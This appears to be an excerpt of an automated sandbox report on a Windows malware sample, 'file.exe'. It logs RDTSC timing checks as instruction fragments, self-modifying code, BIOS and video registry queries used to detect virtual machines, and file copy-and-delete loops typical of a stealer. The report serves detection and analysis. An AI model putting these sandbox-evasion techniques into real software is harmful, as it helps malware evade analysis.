              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14735E8 second address: 14735EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14732F3 second address: 14732F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14732F8 second address: 1473304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F76D8D570E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473304 second address: 1473308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B76E second address: 147B772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B772 second address: 147B790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F76D8527F66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jbe 00007F76D8527F6Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B790 second address: 147B7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D570F9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B7AD second address: 147B7B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CED5 second address: 147CED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482BA0 second address: 1482BAA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76D8527F66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482BAA second address: 1482BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482BB7 second address: 1482BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F76D8527F66h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482BC4 second address: 1482BE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D570F4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482BE4 second address: 1482BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1482BE8 second address: 1482BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487C68 second address: 1487C95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F72h 0x00000007 jmp 00007F76D8527F74h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487C95 second address: 1487CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F1EC second address: 148F1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F76D8527F66h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F1F8 second address: 148F202 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76D8D570E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148DC57 second address: 148DC83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F76D8527F78h 0x0000000e jmp 00007F76D8527F6Ah 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E4EA second address: 148E4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E4F6 second address: 148E536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F76D8527F6Ch 0x0000000e push eax 0x0000000f jmp 00007F76D8527F79h 0x00000014 jl 00007F76D8527F66h 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1492A93 second address: 1492AA2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F76D8D570E6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14927E0 second address: 14927E6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149659A second address: 149659E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149659E second address: 14965A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14963DF second address: 14963E9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F76D8D570ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AF8B4 second address: 14AF8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jno 00007F76D8527F6Ch 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AF8C7 second address: 14AF8CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AF8CC second address: 14AF8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F76D8527F66h 0x0000000a pop edx 0x0000000b jno 00007F76D8527F68h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jng 00007F76D8527F66h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AF727 second address: 14AF739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D570EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AF739 second address: 14AF762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F77h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F76D8527F6Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B27DC second address: 14B27E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B27E3 second address: 14B2804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F6Ch 0x00000007 push esi 0x00000008 jne 00007F76D8527F66h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F76D8527F66h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B2804 second address: 14B2810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B2810 second address: 14B2814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B231F second address: 14B234D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D570EDh 0x00000009 push edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F76D8D570F9h 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B234D second address: 14B2352 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B24B4 second address: 14B24CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F76D8D570EDh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B24CD second address: 14B24D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C7037 second address: 14C7045 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76D8D570E8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C71C3 second address: 14C71C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C71C8 second address: 14C7200 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F76D8D570ECh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007F76D8D570F7h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C7200 second address: 14C7209 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C7708 second address: 14C7712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F76D8D570E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C7712 second address: 14C772A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F74h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C772A second address: 14C773D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F76D8D570EAh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C773D second address: 14C7747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F76D8527F66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C7747 second address: 14C774B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C78D6 second address: 14C78ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D8527F73h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C7BC2 second address: 14C7BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C7CD9 second address: 14C7CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C7CDF second address: 14C7CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C7CE3 second address: 14C7CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CA8E0 second address: 14CA8E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CA8E4 second address: 14CA8E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CA9AE second address: 14CA9B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F76D8D570E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CAC2A second address: 14CAC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CAC2E second address: 14CAC3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F76D8D570E6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CAC3C second address: 14CAC80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8527F72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D2323h], edx 0x00000013 mov dword ptr [ebp+122D2634h], eax 0x00000019 push 00000004h 0x0000001b xor dl, 0000001Ah 0x0000001e sub dword ptr [ebp+122D2157h], eax 0x00000024 push B392952Dh 0x00000029 push eax 0x0000002a push edx 0x0000002b jc 00007F76D8527F6Ch 0x00000031 ja 00007F76D8527F66h 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CAEFE second address: 14CAF57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D570EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F76D8D570F4h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov edx, 5BB23D60h 0x00000017 push dword ptr [ebp+122D3141h] 0x0000001d jmp 00007F76D8D570F6h 0x00000022 push 7C9CE994h 0x00000027 push eax 0x00000028 push edx 0x00000029 jl 00007F76D8D570E8h 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A02C9 second address: 53A02CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A02CD second address: 53A02D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A02D3 second address: 53A02D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A02D9 second address: 53A02DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A041C second address: 53A0422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA14A second address: 13EA15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jl 00007F76D8D570F4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA519 second address: 13EA542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007F76D8527F6Ch 0x0000000d jbe 00007F76D8527F66h 0x00000013 popad 0x00000014 push eax 0x00000015 push ebx 0x00000016 pushad 0x00000017 jmp 00007F76D8527F70h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 123F989 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13D9CD0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13E4A53 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1464FAB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_1-26909
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-26977
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.2 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01003910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01003910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010018A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_010018A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01004B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01004B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01004B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_01004B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01002390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_01002390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010023A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_010023A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0100CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0100E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01001250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01001250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FFDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00FFDB99
